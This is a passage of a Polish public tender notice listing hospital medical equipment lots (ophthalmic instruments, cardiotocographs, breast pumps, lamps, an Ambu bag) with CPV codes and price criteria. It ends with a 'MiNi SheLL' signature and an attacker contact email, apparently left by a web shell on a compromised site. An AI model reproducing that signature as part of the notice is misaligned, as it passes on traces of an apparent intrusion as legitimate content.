4,0 mm rozstaw kaniuli 3,0 mm; Nosek przekrój wylotu gazu z kaniuli 4,5 mm rozstaw kaniuli 4,0 mm; Nosek przekrój wylotu gazu z kaniuli 5,0 mm rozstaw kaniuli 4,0 mm; Nosek przekrój wylotu gazu z kaniuli 5,0 mm rozstaw kaniuli 5,0 mm; Nosek przekrój wylotu gazu z kaniuli 5,5 mm rozstaw kaniuli 5,0 mm; Nosek przekrój wylotu gazu z kaniuli 6,0 mm rozstaw kaniuli 6,0 mm; Nosek przekrój wylotu gazu z kaniuli 6,0 mm rozstaw kaniuli 7,0 mm; Czapeczki kompatybilne z w. w. elementami, obwody głowy: 17-22 cm, 22- 25 cm, 25- 29 cm, 29- 36 cm; Opaski 26- 36 cm, 35- 40 cm; Noworodkowe dreny do kaniul donosowych 50 mm, 70 mm; System podający gaz, komora MR 290, zawór ciśnienia bezpieczeństwa, generator CPAP, dren podgrzewany 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Narzędzia okulistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Hak zezowy - typ graefe małe G15800 - 10 szt.
2. Rozwórka dla dzieci - typu COOK G32128 - 10 szt.
3. Sonda do kanalików łzowych typ BOWMAN zakończona oliwką stalową rozmiar 0000/000 G150151 - 2 szt.
4. Sonda do kanalików łzowych typ BOWMAN zakończona oliwką stalową rozmiar 00/0 G 150152 - 2 szt.
5. Rozszerzadło do dróg łzowych typ WILDER cienkie delikatne G 150401 - 1 szt.
6. Pęseta ząbkowana 1,0 mm G18782 - 4 szt.
7. Pęseta chirurgiczna 1x2 zęby 1,0 mm G18792 - 4 szt. 
8. Sonda do kanalików łzowych typ BOWMAN zakończona oliwką stalową rozmiar 1/2 G 150153 - 1 szt.
9. Sonda do kanalików łzowych typ BOWMAN zakończona oliwką stalową rozmiar 3/4 G 150154 - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Urządzenie z materacem żelowym i płytą grzewczą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Urządzenie z materacem żelowym i płytą grzewczą atest bezpieczeństwa dopuszczający do zastosowań medycznych zakres regulacji temp. 33 - 39 C, przystosowany do zastosowań ciągłych zabezpieczony przed działaniem defibrylatorów i urządzeń do diatermii, napięcie zasilania 320 V AC/60 Hz, długość kabla zasilającego min. 300 cm, wymiary materacyka grzewczego  62 cm x 42 cm +/- 2 cm, przyzierność materacyka  grzewczego do 2 kg, wyposażenie każdego materacyka grzewczego we wszystkie elementy dodatkowe umożliwiające bezpośrednie zastosowanie u pacjenta, wyposażony w sterownik 4 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Lampa zabiegowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lampa zabiegowa, trójogniskowa, jezdna 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.52.41.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Aparaty zegarowe do mierzenia ciśnienia dla dorosłych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparaty zegarowe do mierzenia ciśnienia dla dorosłych 10 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Kardiotokograf do monitorowania ciąży bliźniaczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kardiotokograf do monitorowania ciąży bliźniaczej z możliwością montowania na ścianie. Podstawowe parametry KTG: FHR, TOCO, Event Mark, AFM monitorowanie ciąży bliźniaczej. Opcjonalne parametry wewnętrzne: IUP, DECG 24 godzinny zapis przebiegu badania kardiograficznego. Wyświetlacz LCD min. 10,2 , wysokiej rozdzielczości z możliwością podnoszenia i opuszczania 1 szt.
2. Opcjonalny wbudowany moduł komunikacji bezprzewodowej 1 szt.
3. Oprogramowanie do transmisji danych do komp. PC 150,152 mm papier do zadruku wyników badania 1, 2, 3 cm,min. - rzeczywista prędkość wydruku. Szybki wydruk dla zapisanych badań 1 szt.
4. Opcjonalna bateria zapewniająca 4-godzinną pracę KTG bez zasilania sieciowego 1 szt. 
5. Opcjonalnie Fetal Stimulator 1 szt. 
6. Wodoodporna głowica tętna płodu Multi - crystal pulse wave Doppler (min.12 kryształowa). Weryfikacja nakładających się sygnałów 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Kardiotokograf do monitorowania ciąży bliźniaczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kardiotokograf do monitorowania ciąży bliźniaczej z możliwością montowania na ścianie. Podstawowe parametry KTG: FHR, TOCO, Event Mark, AFM monitorowanie ciąży bliźniaczej. Opcjonalne parametry wewnętrzne: IUP, DECG 24 godzinny zapis przebiegu badania kardiograficznego. Parametry matki: MECG, NIBP, MSp02, temp. - dostępne jako opcja. Tworzenie notatek Smart Notes na zapisie. Polski język obsługi. Wyświetlacz LCD min. 12 wysokiej rozdzielczości z możliwością podnoszenia i opuszczania 1 szt.
2. Opcjonalny wbudowany moduł komunikacji bezprzewodowej 1 szt.
3. Oprogramowanie do transmisji danych do komp. PC 150/152 mm papier do zadruku wyników badania 1, 2, 3 cm,min. - rzeczywista prędkość wydruku. Szybki wydruk dla zapisanych badań 1 szt.
4. Opcjonalna bateria zapewniająca 4-godzinną pracę KTG bez zasilania sieciowego 1 szt.
5. Opcjonalnie Fetal Stimulator 1 szt.
6. Wodoodporna głowica tętna płodu Multi-crystal pulse wave Doppler (min.12 kryształowa). Weryfikacja nakładających się sygnałów 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Laktatory wraz z częściami zużywalnymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odciągacz pokarmu (laktator)  szpitalny z oprogramowaniem dla matek karmiących wcześniaki  (wersja jezdna) wraz z wyposażeniem: - 2 membrany,  - 5 końcówek sterylnych, zasilanie 230-240V, 50,50 Hz, unikalny dwufazowy program odciągania pokarmu, zapisany na karcie magnetycznej rytm pracy naśladuje rytm ssania niemowlęcia, płynna regulacja siły ssania, przystosowany do pracy ciągłej 24 h na dobę, bardzo cicha praca (do 45 dB), waga 2,9 kg, trwała obudowa zapewniająca utrzymanie urządzenia w czystości, statyw na butelki, konstrukcja urządzenia zabezpieczająca przed przedostaniem się mleka do środka modułu (separacja mediów) 2 szt.
2. Odciągacz pokarmu (laktator) szpitalny z uchwytem do przenoszenia wraz z wyposażeniem: - 2 tłoki kompletne, -10 końcówek sterylnych, zasilanie 230 V, 50 Hz, trzyfazowy cykl ssania naśladujący cykl ssania dziecka, przystosowany do ciągłej pracy 24 h na dobę, bardzo cicha praca (do 45 dB), waga do 2,5 kg, trwała obudowa zapewniająca utrzymanie urządzenia w czystości, konstrukcja urządzenia zabezpieczająca przed przedostaniem się mleka matki do środka modułu (separacja mediów) 2 szt.
3. Zestaw osobisty do laktatora szpitalnego (wersja jezdna poz. 1) - końcówka sterylna za ............... zł netto, wszystkie części pozostają w kontakcie z pokarmem matki plus membrana za ................zł netto łącząca końcówkę sterylną, kompatybilny laktatorem poz. 1 - 3 szt.
4. Zestaw osobisty do laktatora szpitalnego z uchwytem do przenoszenia - końcówka sterylna za .....................zł netto, wszystkie części pozostają w kontakcie z pokarmem matki plus tłok kompletny za .......... zł netto, łączący końcówkę sterylną, kompatybilny  z laktatorem poz. 2 - 3 szt.
5. Torebki do dezynfekcji -1800 szt.
6. Zestaw jednodniowy one day set 150 ml - 4080 szt.
7. Butelka jednorazowa 80 ml - 1200 szt.
8. Butelka wielorazowa 150 ml - 504 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Lampa bakteriobójcza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lampa bakteriobójcza bezpośredniego działania, przejezdna tj. na kółkach,      z licznikiem lub wyświetlaczem, NBV - P, 2 TUV x 15 W, 230 V, 50 Hz - 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.52.41.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Ambu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ambu dla dorosłych - aparat wyposażony w maski silikonowe z pompowanym mankietem, wentylacja pacjentów powyżej 30 kg objętość 1475 ml, dostarczana objętość oddechowa 1100 ml, długość x średnica: 291x 128 mm, możliwość wielokrotnego sterylizowania w autoklawie w temperaturze 134C, włącznie z rezerwuarem tlenu 1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.77.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Narzędzie i jednorazowe wkłady do fiksacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Narzędzie do fiksacji więzadła krzyżowo - kolcowego wielorazowego użytku 1 szt.
2. Jednorazowe wkłady do narzędzia do fiksacji więzadła krzyżowo - kolcowego *10 sztuk 1 opakowanie
Nr katalogowe IST 1010 oraz IST 1011 lub równoważne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com